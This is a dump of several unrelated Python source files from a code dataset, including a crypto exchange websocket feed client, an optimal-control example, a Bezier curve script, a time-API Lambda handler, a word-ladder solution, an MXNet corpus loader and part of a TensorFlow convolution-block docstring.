[])):\n exchs = self._filtered_exchanges(pair)\n if self._separate_feeds:\n for exch in exchs:\n subscribeId = self.subscriptions.setdefault(('CONSOLIDATED', pair, exch), len(self.consolidateds))\n self.consolidateds.append((pair, [exch]))\n msg = json.dumps({\n \"type\" : \"CONSOLIDATED_MARKET_DATA_SUBSCRIBE\",\n \"subscribeId\" : f'cmd{subscribeId}',\n \"symbol\" : pair,\n \"exchanges\" : [exch],\n })\n LOG.debug(f\"{self.id} sending { msg }\")\n await ws.send(msg)\n else:\n subscribeId = self.subscriptions.setdefault(('CONSOLIDATED', pair, ':'.join(exchs)), len(self.consolidateds))\n self.consolidateds.append((pair, exchs))\n msg = json.dumps({\n \"type\" : \"CONSOLIDATED_MARKET_DATA_SUBSCRIBE\",\n \"subscribeId\" : f'cmd{subscribeId}',\n \"symbol\" : pair,\n \"exchanges\" : exchs,\n })\n LOG.debug(f\"{self.id} sending { msg }\")\n await ws.send(msg)\n LOG.debug(f\"{self.id} subscribed { len(self.consolidateds) } consolidated feeds\")\n for pair in self.config.get(CANDLES, []):\n for exch in self._filtered_exchanges(pair):\n subscribeId = self.subscriptions.setdefault(('CANDLESTICK', pair, exch), len(self.candlesticks))\n self.candlesticks.append((pair, exch))\n msg = json.dumps({\n \"type\" : \"CANDLESTICK_MARKET_DATA_SUBSCRIBE\",\n \"subscribeId\" : f'bar{subscribeId}',\n \"symbol\" : pair,\n \"exchange\" : exch,\n \"minutes\" : \"1\"\n })\n LOG.debug(f\"{self.id} sending { msg }\")\n await ws.send(msg)\n LOG.info(f\"{self.id} subscribed { len(self.candlesticks) } candlesticks\")\n\n async def message_handler(self, message):\n # msg = json.loads(message, parse_float=Decimal)\n msg = json.loads(message)\n msg['recv'] = datetime.now(tz=UTC)\n LOG.debug(msg)\n msg_type = msg['type']\n if msg_type == 'BALANCE_INFO':\n if self._track_balances:\n await self._process_balances(msg)\n elif msg_type == 'info':\n LOG.info(f'{ self.id } { msg }')\n elif msg_type == 'MARKET_DATA_CONFIG':\n Etale._pair_exchanges = {info['pair'] : sorted(info['exchanges']) for info in msg['pairs']}\n elif msg_type == 'CONSOLIDATED_MARKET_DATA':\n await self._process_book(msg)\n elif msg_type == 'TRADE_DATA':\n await self._process_trade(msg)\n elif msg_type == 'CANDLESTICK_MARKET_DATA':\n await self._process_candlestick(msg)\n elif msg_type == 'ACCOUNT_UPDATE_MESSAGE':\n await self._process_account_update(msg)\n else:\n LOG.warning(f'{ self.id } unhandled message type { msg_type } : { msg }')\n\n async def _process_book(self, msg):\n '''\n {\n 'type': 'CONSOLIDATED_MARKET_DATA',\n 'subscribeId': 'cmd1',\n 'mcp': 0.035675,\n 'bids': [\n {'fee': 0.0042305161274415, 'exchange': 'CoinbasePro', 'price': 0.03567, 'qty': 39.53383915},\n {'fee': 6.42233034e-05, 'exchange': 'CoinbasePro', 'price': 0.03566, 'qty': 0.60033},\n ...,],\n 'asks': [\n {'fee': 0.0008992817017776002, 'exchange': 'CoinbasePro', 'price': 0.03568, 'qty': 8.40136119},\n {'fee': 0.00075516471, 'exchange': 'CoinbasePro', 'price': 0.03569, 'qty': 7.053},\n ...,],\n }'''\n pair, exchs = self.consolidateds[int(msg['subscribeId'][3:])]\n self.l2_book[pair] = { exch: { BID : sd(), ASK : sd() } for exch in exchs }\n for level in msg['bids']:\n self.l2_book[pair][level['exchange']][BID][level['price']] = (level['qty'], level['fee'])\n for level in msg['asks']:\n self.l2_book[pair][level['exchange']][ASK][level['price']] = (level['qty'], level['fee'])\n # BID : [(level['price'], level['qty'], level['fee'], level['exchange']) for level in msg['bids']],\n # ASK : [(level['price'], level['qty'], level['fee'], level['exchange']) for level in msg['asks']]}\n for exch in exchs:\n await self.callbacks[L2_BOOK](feed=self.id, pair=pair, exchange=exch, book=self.l2_book[pair][exch], index=msg['recv'], mcp=msg['mcp'])\n\n async def _process_trade(self, msg):\n '''\n {\n \"type\":\"TRADE_DATA\"\n \"subscribeId\":\"cmd1\",\n \"exchange\":\"Gdax\",\n \"symbol\":\"BTC-USD\",\n \"side\":\"BID\",\n \"price\":6483.75,\n \"qty\":0.1016,\n \"timestamp\":1536946514850,\n }'''\n await self.callbacks[TRADES](\n feed = self.id,\n pair = msg['symbol'],\n side = BUY if msg['side'] == ASK else SELL,\n amount = msg['qty'],\n price = msg['price'],\n order_id = None,\n index = msg['recv'],\n timestamp = msg['timestamp']/1000.0,\n exchange = msg['exchange'],\n )\n\n\n async def _process_candlestick(self, msg):\n '''\n {\n \"type\":\"CANDLESTICK_MARKET_DATA\", \"Minutes\":\"1\", \"subscribeId\":\"bar12\", \n \"bidsOHLC\":{\n \"Open\":6394.99,\n \"High\":6394.99,\n \"Low\":6394.99,\n \"Close\":6394.99,\n \"openTimestamp\":1540565259155,\n \"closeTimestamp\":1540565319010,\n \"empty\":false\n },\n \"asksOHLC\":{\n \"Open\":6395.0,\n \"High\":6395.0,\n \"Low\":6395.0,\n \"Close\":6395.0,\n \"openTimestamp\":1540565259155,\n \"closeTimestamp\":1540565319010,\n \"Empty\":false\n },\n \"tradesOHLC\":{\n \"Open\":6395.0,\n \"High\":6395.0,\n \"Low\":6394.99,\n \"Close\":6395.0,\n \"openTimestamp\":1540565259655,\n \"closeTimestamp\":1540565318640,\n \"Empty\":false\n },\n \"tradeVolumes\":{\n \"numeratorVolume\":8.570482639999998,\n \"denominatorVolume\":54808.223822029126,\n \"tradeCount\":36,\n \"Empty\":false\n } \n }'''\n\n (pair, exch) = self.candlesticks[int(msg['subscribeId'][3:])]\n recv = msg['recv']\n # bids = msg['bidsOHLC']\n # if bids['empty']:\n # bids = {'index':recv, 'empty':1}\n # else:\n # bids['index'] = recv\n # bids['empty'] = int(bids['empty'])\n # self.bids_data.append(bids)\n # asks = msg['asksOHLC']\n # if asks['empty']:\n # asks = {'index':recv, 'empty':1}\n # else:\n # asks['index'] = recv\n # asks['empty'] = int(asks['empty'])\n # self.asks_data.append(asks)\n trades = msg['tradesOHLC']\n if trades['empty']:\n trades = {'index':recv, 'empty':1}\n else:\n trades['index'] = recv\n trades['empty'] = int(trades['empty'])\n trades['numeratorVolume'] = msg['tradeVolumes']['numeratorVolume']\n trades['denominatorVolume'] = msg['tradeVolumes']['denominatorVolume']\n trades['tradeCount'] = msg['tradeVolumes']['tradeCount']\n\n await self.callbacks[CANDLES](\n feed=self.id,\n exchange=exch,\n pair=pair,\n **trades)\n\n def interrupt(self):\n raise NotImplementedError()\n\n async def get_balances(self):\n msg = {\"type\":\"BALANCE_REQUEST\"}\n evt = self.events.get('balance_request', None)\n if evt is None:\n self.events['balance_request'] = evt = asyncio.Event()\n else:\n evt.clear()\n await self._ws.send(json.dumps(msg))\n await evt.wait()\n return self.balances\n\n def _read_balances(self, msg):\n '''\n {\n 'type': 'BALANCE_INFO', 'recv': datetime.datetime(2019, 2, 28, 15, 6, 59, 502207, tzinfo=)\n 'balances': {\n 'Hitbtc': [\n {'currency': {'name': 'BTC'}, 'amount': 50.0},\n {'currency': {'name': 'USDT'}, 'amount': 100000.0} ],\n 'Binance': [\n {'currency': {'name': 'BTC'}, 'amount': 50.0},\n {'currency': {'name': 'USDT'}, 'amount': 100000.0} ],\n 'Blockchain': [],\n ...},\n }'''\n all_exchanges = 0\n new_exchanges = 0\n all_amounts = 0\n new_amounts = 0\n chg_amounts = 0\n data = msg['balances']\n for exch, info in data.items():\n exch_balances = self.balances.get(exch)\n all_exchanges += 1\n if exch_balances is None:\n self.balances[exch] = dict((item['currency']['name'], item['amount'])\n for item in info)\n new_exchanges += 1\n else:\n for item in info:\n cur = item['currency']['name']\n amt = exch_balances.get(cur)\n if amt is None:\n LOG.info(f\"Got balance for {cur}: {amt}\")\n new_amounts += 1\n elif amt != item['amount']:\n LOG.info(f\"Got new balance for {cur}: {amt} -> {item['amount']}\")\n chg_amounts += 1\n exch_balances[cur] = item['amount']\n all_amounts += 1\n self.balances['last_update'] = time()\n self.balances['last_update_stats'] = {\n 'all_exchanges':all_exchanges,\n 'new_exchanges':new_exchanges,\n 'all_amounts':all_amounts,\n 'new_amounts':new_amounts,\n 'chg_amounts':chg_amounts,\n }\n LOG.info(f'{self.id } { msg }')\n LOG.info(f'read balances for {all_exchanges} ({new_exchanges} new); {all_amounts} ccys ({new_amounts} new, {chg_amounts} chg)')\n evt = self.events.get('balance_request', None)\n if evt is not None:\n evt.set()\n\n async def _process_balances(self, msg):\n self._read_balances(msg)\n # insert async callbacks for reading balances\n\n async def _process_account_update(self, msg):\n '''\n {\n 'type': 'ACCOUNT_UPDATE_MESSAGE',\n 'recv': datetime.datetime(2019, 2, 28, 15, 10, 59, 513023, tzinfo=),\n 'updates': [\n {\n 'pathToAccount': ['ROOT', 'DEFAULT_ACC'],\n 'currency': 'BTC',\n 'qty': 200.0,\n 'realizedPnl': 0.0,\n 'unrealizedPnl': -35286.39999999996,\n 'dollarValue': 764713.6000000001\n },\n {\n 'pathToAccount': ['ROOT', 'DEFAULT_ACC'],\n 'currency': 'USD',\n 'qty': 200000.0,\n 'realizedPnl': 0.0,\n 'unrealizedPnl': 0.0,\n 'dollarValue': 200000.0\n },\n {\n 'pathToAccount': ['ROOT', 'DEFAULT_ACC'],\n 'currency': 'USDT', 'qty': 200000.0, 'realizedPnl': 0.0, 'unrealizedPnl': 0.0, 'dollarValue': 200000.0}\n ],\n }'''\n LOG.info(msg)\n pass\n\n\n async def send_order(self, side, pair, limitPrice, quantity, exchanges,\n useFeeAdjustment=\"false\", routingAlgo=\"DMA\", timeInForce=\"GTC\",\n stableCoins=[ {\"stableCoin\":\"TUSD\",\"discountFactor\":0.99},\n {\"stableCoin\":\"USDC\",\"discountFactor\":0.99},\n {\"stableCoin\":\"USDT\",\"discountFactor\":0.99} ]):\n '''\n {\n \"type\":\"ORDER\",\n \"clOrdId\":, \"side\":\"SELL\",\n \"pair\":\"ETH-USD\",\n \"limitPrice\":407,\n \"quantity\":1, \"exchanges\":[\"Gemini\"], \"useFeeAdjustment\": false, \"routingAlgo\":\"CERA\",\n \"timeInForce\": \"GTC\",\n \"stableCoins\": [\n {\"stableCoin\":\"TUSD\",\"discountFactor\":1},\n {\"stableCoin\":\"USDT\",\"discountFactor\":1} ]\n }'''\n clOrdId = -1\n msg = json.dumps({\n \"type\" : \"ORDER\",\n \"clOrdId\": clOrdId,\n \"side\" : side,\n \"pair\" : pair,\n \"limitPrice\" : limitPrice,\n \"quantity\" : quantity,\n \"exchanges\" : exchanges,\n \"useFeeAdjustment\" : useFeeAdjustment,\n \"routingAlgo\" : routingAlgo,\n \"timeInForce\" : timeInForce,\n \"stableCoins\" : stableCoins\n })\n log.INFO(f'{ self.id } sending { msg }')\n raise NotImplementedError()\n await self._ws.send(msg)\n\n async def send_wap_order(self, side, pair, limitPrice, quantity, exchanges, startTime, endTime,\n participationRate, useFeeAdjustment=\"false\", routingAlgo=\"TWAP\"):\n '''\n {\n \"type\":\"WAP_ORDER\",\n \"clOrdId\":,\n \"side\":\"SELL\",\n \"pair\":\"ETH-USD\",\n \"limitPrice\":407,\n \"quantity\":1,\n \"exchanges\":[\"Gemini\", \"Gdax\"],\n \"useFeeAdjustment\": false,\n \"routingAlgo\":\"TWAP\"\n \"startTime\":\"2018-08-03 17:01 GMT+04:00\",\n \"endTime\":\"2018-08-03 17:19 GMT+04:00\",\n \"participationRate\": 0.4\n }'''\n raise NotImplementedError()\n await self._ws.send(msg)\n\n# For the PEG and LUCY order types the order message has the following format:\n# {\n# \"type\":\"PEG_ORDER\", \"routingAlgo\":\"PEG\",\n# \"clOrdId\":, \"side\":\"SELL\",\n# \"pair\":\"ETH-USD\",\n# \"limitPrice\":407,\n# \"quantity\":1,\n# \"exchanges\":[\"Gemini\", \"CoinbasePro\"], \"orderPlacementExchange\":\"CoinbasePro\", \"referencePriceType\":\"PRIMARY\", \"priceOffset\":0.01,\n# \"tolerance\":0.05, \"useFeeAdjustment\": false }\n# The fields definitions are as follows:\n# clOrdId\n# Unique ID assigned by the user to identify this order.\n# side\n# BUY or SELL\n# routingAlgo\n# DMA, TWAP, SOR, CERA, PEG, LUCY, or PARTICIPATION\n# pair\n# The symbol being traded.\n# limitPrice\n# The limit price for the order. Only valid for DMA, SOR, CERA, and Participation Rate orders.\n# quantity\n# The quantity to trade\n# timeInForce\n# GTC or IOC. Only used by DMA orders.\n# exchanges\n# The list of exchanges to which this order may be routed. Note: for DMA orders this must be a single exchange. Also, for Portfolio TWAP orders, this must be a single exchange.\n# stableCoins\n# Used for CERA orders. This is a map of stable coin pairs with associated discount factors. The format of the map is:\n# [\n# {\"stableCoin\":\"TUSD\",\"discountFactor\":1} , {\"stableCoin\":\"USDT\",\"discountFactor\":1}\n# ]\n# useFeeAdjustment\n# \"True\" if fees should be considered when making routing decisions, false otherwise. Ignored for DMA orders.\n# startTime\n# The start time of the order. Only valid for TWAP and Participation Rate orders.\n# endTime\n# The end time of the order. Only valid for TWAP and Participation Rate orders.\n# participationRate\n# The fraction of the current volume that the algorithm should maintain. Only valid for Participation Rate orders.\n# orderPlacementExchange\n# The exchange at which to place the peg order. Only valid for PEG orders.\n \n# referencePriceType\n# The reference price to peg to.One of PRIMARY (the favorable side of the market), MARKET(the aggressive, or marketable side of the market) or MCP(the market clearing price). Only valid for PEG orders.\n# priceOffset\n# The offset from the reference price to peg the order to. Only valid for PEG orders. Must be 0 or negative for PRIMARY and MCP peg orders. Only valid for PEG orders.\n# tolerance\n# The price drift threshold above which a peg order is cancelled and replaced by a new peg order at an updated price. Only valid for PEG orders.\n# agression\n# Aggressiveness setting for the order. Used for LUCY orders.\n# passiveDurationSecs\n# How long the order should hunt for passive liquidity before turning aggressive. Used for LUCY orders.\n# After an order is placed, Etale will respond with an order acknowledgment message:\n# {\n# \"type\":\"ORDER_ACK\",\n# \"clOrdId\": , \"status\": <\"accepted\", \"rejected\">, \"reason\": \"order status info\"\n# }\n# Order fills are reported with fill messages as child orders complete. The fill message format is as follows:\n# {\n# \"type\":\"ORDER_EXECUTION_REPORT\", \"clOrdId: \"...\", \"originatingOrderClOrdId\" : \"...\", \"orderId: \"...\",\n# \"symbol\": \"ETH-USD\",\n# \"side\": <\"BUY\", \"SELL\"> \"orderQty\": 10,\n# \"filledQty\": 1,\n# \"unfilledQty\": 9,\n# \"price\": 6700,\n# \"status\": <\"active\", \"done\"> \"lastQty\": 1,\n# \"lastPrice\": 6500,\n# \"exchange\": \"Gdax\",\n# \"exchangeId\": \".....\", \"execId\": \".....\", \"reason\": \".....\"\n# }\n# For WAP orders, a separate WAP order update will also be published along with each execution report. It will contain a summary of the status of the order.\n# {\n# \"id\":\"1539805694642\", \"clOrdId\":\"clOrdIdx-1070\", \"wapType\":\"TWAP\", \"percentComplete\":20, \"startMs\":1539806280000, \"endMs\":1539806580000, \"reserveCurrency\":\"\", \"status\":\"ACTIVE\", \"description\":\"...\", \"type\":\"WAP_UPDATE\"\n# }\n# For PEG and LUCY orders, a separate order update will also be published along with each execution report. It will contain a summary of the status of the order.\n# {\n# \"id\":\"1550838031822\", \"clOrdId\":\"1-ID0009939\", \"pegType\":\"PEG\", \"receivedTimeMs\":1550862123215, \"originalQty\":5,\n# \"filledQty\":0, \"status\":\"ACTIVE\", \"numOrdersPlaced\":1, \"description\":\"...\", \"type\":\"PEG_UPDATE\"\n# }\n# To cancel an active order send a cancel message>\n# {\n# \"type\": \"ORDER_CXL\", \"clOrdId\":\"....\"\n# }\n# In response to a cancel request, a cancel response message will be sent:\n# {\n# \"type\":\"ORDER_EXECUTION_REPORT\", \"clOrdId\":, \"status\": \"done\",\n# \"reason\": \"User cancelled\"\n# }\n\n\n# {\n# \"type\":\"ACTIVE_ORDER_REQUEST\"\n# }\n# The response to this message is :\n# { \"type\":\"ACTIVE_ORDERS\", \"orders\": [\n# { \"type\":\"ORDER_STATUS\", \"clOrdId: \"...\", \"orderId: \"...\", \"symbol\": \"ETH-USD\",\n# \"side\": <\"BUY\", \"SELL\"> \"orderQty\": 10,\n# \"filledQty\": 1, \"unfilledQty\": 9,\n# \"price\": 6700,\n# \"status\": <\"active\", \"done\">\n# },... ]\n# }\n\n# {\n# \"type\": \" BCDM_SUBSCRIBE \", \"subscribeId\": \"BCDM-1\"\n# }\n# To unsubscribe send the following message:\n# {\n# \"type\": \" BCDM_UNSUBSCRIBE \", \"subscribeId\": \"BCDM-1\"\n# }\n# Updates messages are in the following format:\n# {\n# \"subscribeId\":\"BCDM-1\", \"transfers\":[\n# {\n# \"index\":1537219982010, \"date\":\"17/09/18\", \"timestamp\":\"17:52:11\", \"qty\":19.95767434586466, \"coin\":\"ZRX\", \"fromAddress\":\"0x384896375...\", \"toAddress\":\"0x4cd49ef1...\", \"tx\":\"NA\"\n# }, {\n# } ],\n# \"index\":1537219982011, \"date\":\"17/09/18\", \"timestamp\":\"17:52:12\", \"qty\":1.48574446,\n# \"coin\":\"LTC\", \"fromAddress\":\"504ea591e3477c...\", \"toAddress\":\"LN8DXdQWvT3GL...\", \"tx\":\"504ea591e34...\"\n# \"type\":\"BCDM_UPDATE\" }\n\n","sub_path":"cryptofeed/etale/etale.py","file_name":"etale.py","file_ext":"py","file_size_in_byte":22890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106741897","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom Git.OptimalControl.DirectCollocation import dircol\n\n# Double Integrator Example\n# x[0] = position\n# x[1] = velocity\n# u[0] = control effort\n\n\ndef L(x,u):\n return x[0]**2 + x[1]**2\n\ndef phi(x,u):\n return 10*x[0]**2 + 10*x[1]**2\n\ndef f(x,u,d):\n dx = np.empty(shape=(len(x)))\n dx[0] = x[1]\n dx[1] = u[0] + d[0]\n return dx\n\nt = np.arange(0,10,0.5)\ncontroller = dircol(xdim=2, # Dimension of State Vector\n udim=1, # Dimension of Control Vector\n ddim=1, # Dimension of Disturbance Vector\n L=L, # Running Cost\n phi=phi, # Terminal Cost\n f=f, # System Dynamics\n g=[], # Point Inequality Constraints\n h=[], # Point Equality Constraints\n umax = [5], # Control Upper Bound\n umin = [-5], # Control Lower Bound\n xmax=[None,None], # State Upper Bound\n xmin=[None,None], # State Lower Bound\n t = t) # Discrete Time Steps. Shape = (N)\n\n\nx,u = controller.path(x0=[-20,0], # Initial State. Shape = (xdim)\n u_guess = None, # Initial Guess for Control Trajectory. Shape = (N,udim)\n x_guess = None, # Initial Guess for State Trajectory. Shape = (N,xdim)\n d_guess = None, # Initial Guess for Disturbance Trajectory. Shape = (N,ddim)\n maxIter=10, # Max iterations done by scipy's SLSQP Optimizer.\n minCost=0, # Min cost-tolerance in Optimizer before termination\n xN=[None,None]) # Hard Equality-constraint on Terminal State. Shape = (xdim)\n\n\n# Plotting discrete solution\nplt.scatter(t,x[:,0],s=15)\nplt.scatter(t,u[:,0],s=15)\n\n# Interpolation into \"Continuous\" Solution\nt = np.arange(0,10,0.01)\nx,u = controller.interpolate(x=x,u=u,d=None,t=t)\nplt.plot(t,u[:,0],label='control')\nplt.plot(t,x[:,0],label='position')\nplt.grid(True)\nplt.legend()\nplt.show()\n\n\n\n\n\n\n","sub_path":"doubleIntegrator.py","file_name":"doubleIntegrator.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"67053696","text":"#!/usr/bin/env python3\nimport sys\nimport math\nfrom decimal import Decimal as D\n#helper function to calculate combination\ndef nCr(n,r):\n return (math.factorial(n) / math.factorial(r) / math.factorial(n-r))\n#helper function to list all number between a and b given step c\ndef frange(a, b, c):\n\twhile a < b:\n\t\tyield round(D(a), 4)\n\t\ta+=c\n#create a class to calculate Bezier curve\nclass BezierCurve:\n\tdef __init__(self, d=0.05, l= [], r= 0.1):\n\t\t#input that specifies the increment u\n\t\tself.d = d\n\t\t#list of input control points\n\t\tself.point_list = l\n\t\t#radius of the curve, only serves purpose in FreeCAD\n\t\tself.radius = r\n\t\t#number of input points\n\t\tself.num_of_points= 0\n\t\t#number of output points\n\t\tself.num_of_output = 0\n\t#function to calculate the Bezier curve, given the input control points and the increment\n\tdef calculate_curve(self):\n\t\tpoint_list =[]\n\t\tfor t in frange(0, 1+ self.d, self.d):\n\t\t\tself.num_of_output +=1\n\t\t\t#separately calculate p for each dimension\n\t\t\tp_x = 0\n\t\t\tp_y = 0\n\t\t\tp_z = 0\n\t\t\tfor i in range(self.num_of_points+1):\n\t\t\t\t#calculate Bezier Curve using the formula\n\t\t\t\tp_x += nCr(self.num_of_points, i) * math.pow(round((1-t), 6), (self.num_of_points-i))* math.pow(t, i) * self.point_list[i][0]\n\t\t\t\tp_y += nCr(self.num_of_points, i) * math.pow(round((1-t), 6), (self.num_of_points-i))* math.pow(t, i) * self.point_list[i][1]\n\t\t\t\tp_z += nCr(self.num_of_points, i) * math.pow(round((1-t), 6), (self.num_of_points-i))* math.pow(t, i) * self.point_list[i][2]\n\t\t\tprint(round(p_x, 6), round(p_y, 6), round(p_z, 6), end= \",\\n\")\n\ndef main():\n\tfilename =\"HW1_test4.txt\"\n\tu = 0.01\n\tr= 0.1\n\t#check for specified arguments, otherwise the program will run with default values\n\tfor i in range(len(sys.argv)):\n\t\tif sys.argv[i] == \"-f\":\n\t\t\tfilename = sys.argv[i+1]\n\t\telif sys.argv[i] == \"-u\":\n\t\t\tu = round(float(sys.argv[i+1]), 4)\n\t\telif sys.argv[i] == \"-r\":\n\t\t\tr = round(float(sys.argv[i+1]), 4)\n\t#initiate the object\n\tbz = BezierCurve(u, [], r)\n\twith open(filename) as file:\n\t\t#record output to fit Open Inventor format\n\t\toutput = \"\"\n\t\t#read input file, record the control points\n\t\tfor line in file:\n\t\t\ts =\"Separator {LightModel {model PHONG}Material {\tdiffuseColor 1.0 1.0 1.0}\\nTransform {translation\\n\"\n\t\t\tpoint=[]\n\t\t\tline = line.split(\"\\n\")[0]\n\t\t\tpoints = line.split(\" \")\n\t\t\tfor p in points:\n\t\t\t\ts+= p + \" \"\n\t\t\t\tp = float(p)\n\t\t\t\tpoint.append(p)\n\t\t\ts+=\"\\n}Sphere {\tradius \" + str(r) + \" }}\\n\"\n\t\t\toutput+=s\n\t\t\t#store all input control points to later calculate the curve\n\t\t\tbz.point_list.append(point)\n\t\t\tbz.num_of_points=len(bz.point_list)-1\n\tprint(\"#Inventor V2.0 ascii\\nSeparator {LightModel {model BASE_COLOR} Material {diffuseColor 1.0 1.0 1.0}\\nCoordinate3 { \tpoint [\")\n\n\t#calculate the curve then output to stdout\n\tbz.calculate_curve()\n\tprint(\"] }\")\n\t#record output to fit Open Inventor format\n\tindexes = \"IndexedLineSet {coordIndex [\\n\"\n\tfor i in range(bz.num_of_output):\n\t\tindexes+= str(i) + \", \"\n\tindexes+=\"-1, \\n] } }\"\n\tprint(indexes)\n\tprint(output)\n\t#close the file\n\tfile.close()\nmain()\n","sub_path":"HW1/BezierCurve.py","file_name":"BezierCurve.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"635195477","text":"import sys\nimport requests\n\nERROR = u'error'\nUNIX_TIME = u'unixtime'\n\nAPI_TIMEZONE_ = \"http://worldtimeapi.org/api/timezone/Europe/\"\n\n\ndef get_unix_time(locale):\n url = API_TIMEZONE_ + locale\n \n # HTTP request\n try:\n r = requests.get(url)\n except requests.exceptions.RequestException as e:\n return e\n \n content = r.json()\n \n # Check if the response returned any error\n if (ERROR in content):\n\t return (\"Sorry there was an Error: \", content[u'error'])\n\n # Parse the Unix Time \n unix_time = content[(u'%s' % UNIX_TIME)]\n\n return {\n 'unixtime': unix_time\n }\n\n\ndef lambda_handler(argv, event):\n locale = argv['locale']\n return get_unix_time(locale)\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"56166662","text":"class Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList: return 0\n wordList = set(wordList)\n s1, s2 = set(), set()\n s1.add(beginWord)\n s2.add(endWord)\n step = 1\n while s1 and s2:\n step += 1\n if len(s1) > len(s2):\n s1, s2 = s2, s1\n s = set()\n for word in s1:\n next_words = [word[:i] + c + word[i + 1:] for i in range(len(word)) for c in 'abcdefghijklmnopqrstuvwxyz']\n for mutation in next_words:\n if mutation in s2: return step\n if mutation in wordList:\n wordList.remove(mutation)\n s.add(mutation)\n s1 = s\n return 0","sub_path":"Week_04/leetcode_127.py","file_name":"leetcode_127.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"82429333","text":"#!/usr/bin/env python\n# coding: utf-8\n#\n# Usage: \n# Author: wxm71(weixing.mei@aispeech.com)\n\nimport math\nimport logging\nimport mxnet as mx\n\nfrom .utils import tokenize, batchify\nfrom .vocab import Vocab\nfrom .corpusiter import CorpusIter\n\ndef dump_data(data, base):\n fid = open(base, 'w')\n buf = [str(i) for i in data[0:100]]\n fid.write(' '.join(buf))\n fid.close()\n\n\nclass Corpus(object):\n def __init__(self, basedir=None, vocab:Vocab=None):\n self.logger = logging.getLogger(str(self.__class__))\n\n ftrain = '%s/train.txt' % basedir\n fvalid = '%s/valid.txt' % basedir\n ftest = '%s/test.txt' % basedir\n\n update_vocab = vocab is None\n self.data_train, self.vocab = tokenize(ftrain, vocab, update_vocab=update_vocab, eos=True)\n self.data_valid, _ = tokenize(fvalid, self.vocab, eos=True)\n self.data_test, _ = tokenize(ftest, self.vocab, eos=True)\n\n self._test_iter = None\n self._train_iter = None\n self._valid_iter = None\n\n self.wrdfrq = []\n self.total_wrd = 0\n\n self.build_wrdcnt()\n\n\n def build_wrdcnt(self):\n self.total_wrd = 0\n self.wrdfrq = [0.0]*len(self.vocab)\n\n for idx in self.data_train: \n self.wrdfrq[idx] += 1\n self.total_wrd += 1\n\n for idx,cnt in enumerate(self.wrdfrq): \n self.wrdfrq[idx] /= self.total_wrd\n\n\n def _get_iter(self, data, batch_size, bptt, num_parall=2):\n return CorpusIter(data, batch_size, bptt, num_parall) \n\n\n def get_train_iter(self, batch_size, bptt, num_parall=2):\n if not self._train_iter:\n self._train_iter = self._get_iter(self.data_train, batch_size, bptt, num_parall) \n return self._train_iter\n\n\n def get_test_iter(self, batch_size, bptt, num_parall=2):\n if not self._test_iter:\n self._test_iter = self._get_iter(self.data_test, batch_size, bptt, num_parall) \n return self._test_iter\n\n\n def get_valid_iter(self, batch_size, bptt, num_parall=2):\n if not self._valid_iter:\n self._valid_iter = self._get_iter(self.data_valid, batch_size, bptt, num_parall) \n return self._valid_iter\n","sub_path":"example/rnn/nce/src/loader/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24140413","text":"__author__ = 'Muneer'\n\nimport random, math\n\n\ndef wrap_around(pos, ScreenLengths):\n # check if its out of the screen\n x, y = pos\n if x > ScreenLengths[0] - 1:\n pass\n # check x\n x = x % ScreenLengths[0]\n # check y\n y = y % ScreenLengths[1]\n\n return x, y\n\n\ndef get_random_position(screenlengths):\n return (random.randint(0, screenlengths[0]), random.randint(0, screenlengths[1]))\n\n\ndef rotate_2D(point, angle):\n rad = math.radians(angle)\n rotate = (\n (math.cos(rad), -math.sin(rad)),\n (math.sin(rad), math.cos(rad))\n )\n\n result = (point[0] * rotate[0][0] + point[1] * rotate[1][0],\n point[0] * rotate[0][1] + point[1] * rotate[1][1])\n\n return ((result[0]), (result[1]))\n\ndef lerp(current, target, speed):\n diff = ((target[0] - current[0]) * speed, (target[1] - current[1]) * speed)\n return (current[0] + diff[0], current[1] + diff[1])\n","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"328179310","text":"\"\"\" Contains convolution layers \"\"\"\nimport logging\nimport numpy as np\nimport tensorflow as tf\n\nfrom .core import Dense, Dropout, AlphaDropout, BatchNormalization, Mip\nfrom .conv import Conv, ConvTranspose, SeparableConv, SeparableConvTranspose, DepthwiseConv, DepthwiseConvTranspose\nfrom .pooling import Pooling, GlobalPooling\nfrom .drop_block import Dropblock\nfrom .resize import ResizeBilinearAdditive, ResizeBilinear, ResizeNn, SubpixelConv\nfrom .layer import add_as_function\nfrom ...utils import unpack_args\n\n\nlogger = logging.getLogger(__name__)\n\n\n\n@add_as_function\nclass ConvBlock:\n \"\"\" Complex multi-dimensional block to apply sequence of different operations.\n\n Parameters\n ----------\n layout : str\n A sequence of letters, each letter meaning individual operation:\n\n - c - convolution\n - t - transposed convolution\n - C - separable convolution\n - T - separable transposed convolution\n - w - depthwise convolution\n - W - depthwise transposed convolution\n - f - dense (fully connected)\n - n - batch normalization\n - a - activation\n - p - pooling (default is max-pooling)\n - v - average pooling\n - P - global pooling (default is max-pooling)\n - V - global average pooling\n - d - dropout\n - D - alpha dropout\n - O - dropblock\n - m - maximum intensity projection (:class:`~.layers.Mip`)\n - b - upsample with bilinear resize\n - B - upsample with bilinear additive resize\n - N - upsample with nearest neighbors resize\n - X - upsample with subpixel convolution (:class:`~.layers.SubpixelConv`)\n - R - start residual connection\n - A - start residual connection with bilinear additive upsampling\n - `+` - end residual connection with summation\n - `*` - end residual connection with multiplication\n - `.` - end residual connection with concatenation\n\n Default is ''.\n\n filters : int\n Number of filters in the output tensor.\n kernel_size : int\n Kernel size.\n name : str\n Name of the layer that will be used as a 